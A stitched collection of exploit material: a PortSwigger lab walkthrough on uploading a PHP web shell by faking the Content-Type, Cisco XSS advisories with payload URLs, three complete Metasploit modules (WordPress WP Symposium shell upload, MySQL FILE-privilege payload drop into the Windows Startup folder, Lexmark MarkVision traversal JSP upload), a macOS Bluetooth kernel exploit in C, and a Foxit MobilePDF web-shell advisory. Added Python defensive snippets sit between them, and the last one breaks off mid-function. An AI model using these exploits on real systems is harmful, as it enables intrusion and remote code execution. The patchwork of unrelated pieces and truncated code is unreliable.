
In this post we will be solving the PortSwigger lab "Web shell upload via Content-Type restriction bypass".

To solve the lab we have to upload a PHP file that reads and shows us the contents of the file /home/carlos/secret, since to prove that we have completed the lab we must submit the contents of this file.

In addition, the server is configured to block file uploads based on the Content-Type header, so we will have to bypass this defence.

In this case the lab itself provides us with an account to log in with, so let's do that.

Once logged in, we land on the account's profile page.

As we can see, there is an option to upload a file, and specifically it appears to be for updating the profile avatar. Let's try to take advantage of this option to upload our PHP file.

First of all, let's set up Burp Suite to intercept the request.

Once Burp Suite is ready, with the proxy enabled, we select the file and click "Upload".

Here Burp Suite intercepts the file upload request.

Let's send the request to the Repeater to work with it more comfortably; to do so, press Ctrl+R.

Once in the Repeater, when we click "Send" we can see the server's response to the file upload.

In this case it tells us that files whose Content-Type header is application/x-php are not allowed, and that only image/jpeg or image/png are permitted.

Knowing the kind of restriction the server is enforcing, we can simply change the Content-Type in our request.

With this the file's content does not change, nor does it affect how the file will be interpreted. With this change made, we retry the upload.

This time we see that it has been uploaded successfully. We can view this response in the browser as well.

At this point we can turn off Burp Suite, since we won't be using it any more.

With that, we go back to our profile.

Now, if we look at the profile, we can see that the avatar has changed and now shows a broken-image error because it does not load correctly.

Right-clicking, we can go to the direct path of the image to check whether it is our PHP file.

Indeed, the PHP file we uploaded has been stored as the avatar file, which is why it did not load in the profile: the page was trying to load an image when the file was not one. On visiting the PHP file directly, the code we placed in it was interpreted, and we managed to read the secret file.

Having read this file, we simply submit the answer.

And with that we complete the lab.

source: https://www.securityfocus.com/bid/47903/info

Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue is being tracked by Cisco Bug ID CSCto12712.

Cisco Unified Operations Manager versions prior to 8.6 are vulnerable. 

http://www.example.com/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)
            
source: https://www.securityfocus.com/bid/47902/info

CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks.

This issue is being monitored by Cisco Bug ID CSCto12704.

CiscoWorks Common Services 3.3 and prior are vulnerable. 

http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
            
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress WP Symposium 14.11 Shell Upload',
      'Description'     => %q{WP Symposium Plugin for WordPress contains a
                              flaw that allows a remote attacker to execute
                              arbitrary PHP code. This flaw exists because the
                              /wp-symposium/server/file_upload_form.php script
                              does not properly verify or sanitize
                              user-uploaded files. By uploading a .php file,
                              the remote system will place the file in a
                              user-accessible path. Making a direct request to
                              the uploaded file will allow the attacker to
                              execute the script with the privileges of the
                              web server.},
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Claudio Viviani',                # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'References'      =>
        [
          ['OSVDB', '116046'],
          ['WPVDB', '7716']
        ],
      'DisclosureDate'  => 'Dec 11 2014',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['wp-symposium < 14.12', {}]],
      'DefaultTarget'   => 0
    ))
  end

  def check
    check_plugin_version_from_readme('wp-symposium', '14.12')
  end

  def generate_mime_message(payload, payload_name, directory_name, symposium_url)
    data = Rex::MIME::Message.new
    data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
    data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
    data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
    data
  end

  def exploit
    print_status("#{peer} - Preparing payload")
    unique_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{unique_name}.php"
    symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
    payload_url = normalize_uri(symposium_url, unique_name, payload_name)
    data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
    symposium_url = normalize_uri(symposium_url, 'index.php')

    print_status("#{peer} - Uploading payload to #{payload_url}")
    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => symposium_url,
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s
    )

    if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
      print_good("#{peer} - Uploaded the payload")
      register_files_for_cleanup(payload_name)

      print_status("#{peer} - Executing the payload...")
      send_request_cgi(
      {
        'uri'     => payload_url,
        'method'  => 'GET'
      }, 5)
      print_good("#{peer} - Executed payload")
    else
      if res.nil?
        fail_with(Failure::Unreachable, "No response from the target")
      else
        vprint_error("#{peer} - HTTP Status: #{res.code}")
        vprint_error("#{peer} - Server returned: #{res.body}")
        fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
      end
    end
  end
end
            
##
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
      'Description'    => %q{
        This module takes advantage of a file privilege misconfiguration problem
        specifically against Windows MySQL servers. This module abuses the FILE
        privilege to write a payload to Microsoft's All Users Start Up directory
        which will execute every time a user logs in. The default All Users Start
        Up directory used by the module is Windows 7 friendly.
      },
      'Author'         =>
        [
          'sinn3r',
          'Sean Verity <veritysr1980[at]gmail.com>'
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' =>  'true'
        },
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5613'], #DISPUTED
          ['OSVDB', '88118'],
          ['EDB', '23083'],
          ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL on Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 01 2012'
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
        OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
      ])
  end

  def check
    m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    return Exploit::CheckCode::Safe unless m

    return Exploit::CheckCode::Appears if is_windows?

    Exploit::CheckCode::Safe
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def query(q)
    rows = []

    begin
      res = mysql_query(q)
      return rows unless res
      res.each_hash do |row|
        rows << row
      end
    rescue RbMysql::ParseError
      return rows
    end

    rows
  end

  def is_windows?
    r = query("SELECT @@version_compile_os;")
    r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
  end

  def get_drive_letter
    r = query("SELECT @@tmpdir;")
    drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''

    drive
  end

  def upload_file(bin, dest)
    p = bin.unpack("H*")[0]
    query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
  end

  def exploit
    unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
      fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
    end

    print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    begin
      m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NoAccess, "#{peer} - Access denied")
    end

    fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m

    unless is_windows?
      fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
    end

    begin
      drive = get_drive_letter
    rescue RbMysql::ParseError
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
    end

    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive

    exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
    dest     = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
    exe      = generate_payload_exe

    print_status("#{peer} - Uploading to '#{dest}'")
    begin
      upload_file(exe, dest)
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
    end
    register_file_for_cleanup("#{dest}")
  end

end
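As an added example (not part of the module above, nor of Metasploit), the following Python audit flags the two preconditions the module depends on: accounts holding the global FILE privilege and a `secure_file_priv` setting that leaves `SELECT ... INTO DUMPFILE` free to write anywhere the mysqld service account can. The grant lines are constructed in the shape `SHOW GRANTS` returns.

```python
"""Added example: audit MySQL FILE-privilege exposure.

Not code from the Metasploit module above. SAMPLE_GRANTS is constructed in
the format that SHOW GRANTS FOR 'user'@'host' returns.
"""
import re
from typing import Dict, List

SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, FILE ON *.* TO 'reporting'@'%'",
    "GRANT SELECT, INSERT ON app.* TO 'webapp'@'10.0.0.%'",
    "GRANT FILE ON *.* TO 'etl'@'localhost'",
]

# Accepts both quoting styles MySQL uses: 'u'@'h' (5.x) and `u`@`h` (8.x).
GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO "
    r"(?P<user>[`'][^`']*[`']@[`'][^`']*[`'])"
)


def accounts_with_file_priv(grant_lines: List[str]) -> List[str]:
    """Return the user@host strings that hold FILE.

    FILE is a global privilege, so only *.* grants can carry it, and
    ALL PRIVILEGES on *.* includes it implicitly.
    """
    hits = []
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs:
            hits.append(m.group("user"))
    return hits


def dumpfile_risk(secure_file_priv: str) -> str:
    """Classify the @@secure_file_priv value.

    ''      -> no restriction: DUMPFILE may target any writable path
    'NULL'  -> import/export operations disabled entirely
    a path  -> writes confined to that directory
    """
    v = (secure_file_priv or "").strip()
    if v == "":
        return "UNRESTRICTED"
    if v.upper() == "NULL":
        return "DISABLED"
    return "CONFINED"


def audit(grant_lines: List[str], secure_file_priv: str) -> Dict[str, object]:
    """Combine both checks; the module's technique needs both to be true."""
    file_users = accounts_with_file_priv(grant_lines)
    risk = dumpfile_risk(secure_file_priv)
    return {
        "file_privilege_accounts": file_users,
        "dumpfile": risk,
        "arbitrary_path_write_possible": risk == "UNRESTRICTED" and bool(file_users),
    }
```

Feed it the real output of `SHOW GRANTS FOR` each account and `SELECT @@secure_file_priv`; any account listed with the DUMPFILE risk at UNRESTRICTED can write a file into a startup folder exactly as the module does.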
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
      'Description'   => %q{
        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
        A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
        attacker to upload arbitrary files, including arbitrary JSP code. This module has been
        tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
      },
      'Author'        =>
        [
          'Andrea Micalizzi', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          ['CVE', '2014-8741'],
          ['ZDI', '14-410'],
          ['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US']
        ],
      'Privileged'    => true,
      'Platform'      => 'win',
      'Arch'          => ARCH_JAVA,
      'Targets'       =>
        [
          [ 'Lexmark Markvision Enterprise 2.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 09 2014'))

    register_options(
      [
        Opt::RPORT(9788),
        OptString.new('TARGETURI', [true, 'ROOT path', '/'])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html')
    })

    version = nil
    if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    if Gem::Version.new(version) <= Gem::Version.new('2.0.0')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    jsp_leak = jsp_path
    jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
    # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
    # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webapps\ROOT
    traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"

    print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
    if upload_file(traversal_leak, jsp_leak)
      print_good("#{peer} - JSP successfully uploaded")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    res = execute(jsp_name_leak)

    if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/
      upload_path = $1
      print_good("#{peer} - Working directory found in #{upload_path}")
      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))
    else
      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
    end

    jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    jsp_payload = payload.encoded
    traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"

    print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...")
    if upload_file(traversal_payload, jsp_payload)
      print_good("#{peer} - JSP successfully uploaded")
      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload_name, 3)
  end

  def upload_file(filename, contents)
    good_signature = rand_text_alpha(4 + rand(4))
    bad_signature = rand_text_alpha(4 + rand(4))

    post_data = Rex::MIME::Message.new
    post_data.add_part(good_signature, nil, nil, 'form-data; name="success"')
    post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"')
    # The traversal path is sent as the multipart filename
    post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")

    res = send_request_cgi(
      {
        'uri'    => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'),
        'method' => 'POST',
        'data'   => post_data.to_s,
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
      })

    if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature)
      return true
    else
      return false
    end
  end

  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path.to_s, jsp_name),
      'method' => 'GET'
    }, time_out)

    res
  end

  def jsp_path
    jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("catalina.home"));
%>
    EOS

    jsp
  end

end
            
/*
 * lpe-issue1.c
 * Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari.
 *
 * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey()
 *
 * gcc -Wall -o lpe-issue1{,.c} -framework IOKit
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

#define SIZE 0x1000

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

#ifndef bswap64
#   define bswap64(num)							\
  ( (((uint64_t)(num) << 56)                               )		\
    | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000))		\
    | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000))		\
    | (((uint64_t)(num) <<  8) & UINT64_C(0x000000FF00000000))		\
    | (((uint64_t)(num) >>  8) & UINT64_C(0x00000000FF000000))		\
    | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000))		\
    | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00))		\
    | (((uint64_t)(num) >> 56)                               ) )
#endif

void create_requests(io_connect_t port)
{
  struct BluetoothCall a;
  uint32_t i;
  kern_return_t kr;

  for (i = 0; i < 7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;
  }

  /* DispatchHCIRequestCreate() */
  a.index = 0x0;

  *(uint64_t *)a.args[0] = 5*1000;  /* Timeout */
  memset((void *)a.args[1], 0x81, 0x1000);
  memset((void *)a.args[2], 0x82, 0x1000);
  memset((void *)a.args[3], 0x83, 0x1000);
  memset((void *)a.args[4], 0x84, 0x1000);
  memset((void *)a.args[5], 0x85, 0x1000);
  memset((void *)a.args[6], 0x86, 0x1000);

  for(i = 0; i < 500; i++) {
    kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			     (uint32_t) 0,       /* Selector */
			     NULL, 0,            /* input, inputCnt */
			     (const void*) &a,   /* inputStruct */
			     120,                /* inputStructCnt */
			     NULL, NULL, NULL, NULL); /* Output stuff */

    if(kr == 0xe00002bd) /* Full */
      break;
  }
}

int main(void) {
  struct BluetoothCall a;
  int i;
  void *landing_page = calloc(SIZE, sizeof(char));

  /* Init a */
  for (i = 0; i < 7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;
  }

  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  /* Populating with fake requests. */
  create_requests(port);

  /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
  a.index = 42;
  /* Req number */
  *((uint32_t *)a.args[0]) = 1;
  /* num_of_keys */
  *((uint32_t *)a.args[1]) = 0x20;

  /* Padding */
  memset((void *)a.args[3], 0x33, 152);
  /* mov     rdi, [r14+0AB8h] */
  *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
  /* mov rax, [rdi] */
  *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
  /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */
  *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;

  /* Here some fixing to the vtable is required to return cleanly after the exploit */

#if 0
  /* Debug print */
  for(i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");
#endif

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,            /* input, inputCnt */
			   (const void*) &a,   /* inputStruct */
			   120,                /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
            
Document Title:
===============
Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1400


Release Date:
=============
2015-01-12


Vulnerability Laboratory ID (VL-ID):
====================================
1400


Common Vulnerability Scoring System:
====================================
6.9


Product & Service Introduction:
===============================
Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere.
Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing.
Share, store and synchronize PDF files.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-12:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Foxit Corporation
Product: MobilePDF - iOS Web Application (Wifi) 4.4.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The local file include vulnerability allows remote attackers to include unauthorized local file/path requests or system-specific
path commands to compromise the mobile web-application.

The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the
wifi web interface by using the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context
on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script
code to compromise the iOS app. The execution of the unauthorized local file or path request occurs in the Index of Documents module of the
wifi file service application after the injection. The request method to inject is POST and the attack vector is located on the application side
of the affected iOS application.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. 
Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. 
Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components.

Vulnerable Method(s):
				[+] POST

Vulnerable Module(s):
				[+] Upload

Vulnerable Parameter(s):
				[+] filename (name)

Affected Module(s):
				[+] Index of Documents (http://localhost:8888)



1.2
An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server.

The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the 
filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension 
`pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file 
extension and can access the webshell with elevated access rights to execute. 

The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (app/device) and compromise of the http web-server.


Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] Upload

Vulnerable Parameter(s):
				[+] filename  (multiple extensions)

Affected Module(s):
				[+] Index of Documents (http://localhost:8888)


Proof of Concept (PoC):
=======================
1.1
The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Download and install the FoxIT MobilePDF iOS application
2. Surf to the Documents Index of the Wifi Server (http://localhost:8888)
3. Start to choose a file for the upload function by usage of the search
4. Intercept the session by usage of a tamper and change the name value to the local device path source
5. Continue the request and save the settings. After that go back to the Index of Documents
Note: The execution of the script code occurs in the vulnerable name value of the index file dir list
6. Successful reproduction of the security vulnerability!

PoC: Index of Documents (Name)
<tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td>
<td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr>

--- PoC Session Logs [POST] (File Include > Upload)---
Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8888]
      User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]    
  Referer[http://localhost:8888/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------3796507625132
Content-Disposition: form-data; name="button"; 
filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png" 
Content-Type: image/png

--- PoC Session Logs [GET] (File Dir Index List)---
13:54:26.427[48ms][total 48ms] Status: 200[OK]
GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8888]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]  
    Referer[http://localhost:8888/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[142]
      Date[Sa., 10 Jan. 2015 12:49:30 GMT]

Reference(s):
http://localhost:8888/
http://localhost:8888/%3C/./



1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: URL
http://localhost:8888/./webshell.png.html.php

PoC: Index of Documents
<tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td>
<td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td>
<td align="center"><span class="s">538 B</span></td></tr>

--- PoC Session Logs [POST] ---
14:03:16.481[149ms][total 1583ms] Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8888]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8888/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------282243582256
Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png"
Content-Type: image/png

Reference(s):
http://localhost:8888/
http://localhost:8888/./webshell.png.html.php


Solution - Fix & Patch:
=======================
1.1
The file include vulnerability can be patched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request.
Restrict the filename input and filter with an own set exception to prevent application-side attacks.
Parse also in the Index of Documents the vulnerable name output value to solve the issue.

1.2
Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions.
Restrict the upload folder and disallow the execution of files that are already uploaded.
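The PortSwigger lab earlier on this page shows a server that accepts any body as long as the client-supplied Content-Type says image/png or image/jpeg, and the Foxit advisory (1.1 and 1.2) a server that neither confines the uploaded filename to a single extension nor escapes it in the Index of Documents. As an added example, not code from either source, the following Python validator implements the fixes both texts call for: it decides on the file body (magic bytes), an extension allowlist tied to the sniffed type, and a dot-free filename stem, and it escapes the name when rendering the index row. The sample PNG/JPEG bodies and the names tested against it are constructed.

```python
"""Added example: server-side upload validation that trusts neither the
client-supplied Content-Type header nor the client-supplied filename.

Not code from the PortSwigger lab or the Foxit advisory; PNG_SAMPLE and
JPEG_SAMPLE are constructed header-only bodies for demonstration.
"""
import html
import os
import posixpath
import re
from typing import Optional

# File signatures the body must start with for each permitted image type.
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
}
# Extensions allowed for each sniffed type (a real PNG may not be stored as .php).
EXT_FOR_TYPE = {"image/png": (".png",), "image/jpeg": (".jpg", ".jpeg")}
# Filename stem: no dots at all, so "a.png.html.php.js.png" can never pass.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Constructed minimal bodies (signature plus padding).
PNG_SAMPLE = MAGIC["image/png"] + b"\x00" * 16
JPEG_SAMPLE = MAGIC["image/jpeg"] + b"\xe0" + b"\x00" * 16


class UploadRejected(ValueError):
    """Raised for any upload the validator refuses to store."""


def sniff_type(body: bytes) -> Optional[str]:
    """Return the image type implied by the leading bytes, or None."""
    for mime, sig in MAGIC.items():
        if body.startswith(sig):
            return mime
    return None


def safe_filename(raw: str) -> str:
    """Reduce a client filename to <stem><.ext> or raise.

    Rejects NUL bytes, strips any directory part written with either
    separator (so "..\\..\\tomcat\\webapps\\ROOT\\x.jsp" keeps only x.jsp),
    and requires a dot-free stem, which refuses multi-extension names.
    """
    if "\x00" in raw:
        raise UploadRejected("NUL byte in filename")
    name = posixpath.basename(raw.replace("\\", "/"))
    stem, ext = os.path.splitext(name)
    if not SAFE_STEM.match(stem):
        raise UploadRejected(f"unsafe filename stem: {stem!r}")
    return stem + ext.lower()


def validate_upload(filename: str, declared_type: str, body: bytes) -> str:
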